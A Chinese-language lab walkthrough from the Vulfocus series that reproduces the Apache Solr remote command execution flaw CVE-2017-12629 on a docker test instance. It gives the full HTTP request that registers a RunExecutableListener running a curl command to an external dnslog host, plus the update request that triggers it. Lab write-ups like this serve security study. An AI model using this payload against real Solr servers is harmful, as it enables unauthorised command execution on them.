[Vulfocus解题系列] Apache Solr 远程命令执行漏洞（CVE-2017-12629）_vulfocus solr 上传代码

介绍

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发，主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞：XML实体扩展漏洞（XXE）和远程命令执行漏洞（RCE），二者可以连接成利用链，编号均为CVE-2017-12629。

影响版本

Apache Solr 5.5.0到7.0.1版本

复现过程

docker搭建 Apache Solr 环境

burp抓包

改包

POST /solr/demo/config HTTP/1.1
Host:ip:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 178

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "curl http://m9c5f3.ceye.io:80/123456"]}}

1
2
3
4
5
6
7
8
9
10
11
12

图中方块为执行的命令，采用dnslog进行验证漏洞存在

然后进行update操作，触发刚才添加的listener：
发送这个包触发所有存在的listener！

POST /solr/demo/update HTTP/1.1
Host: ip:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]

1
2
3
4
5
6
7
8
9
10
11

成功收到回显，证明漏洞存在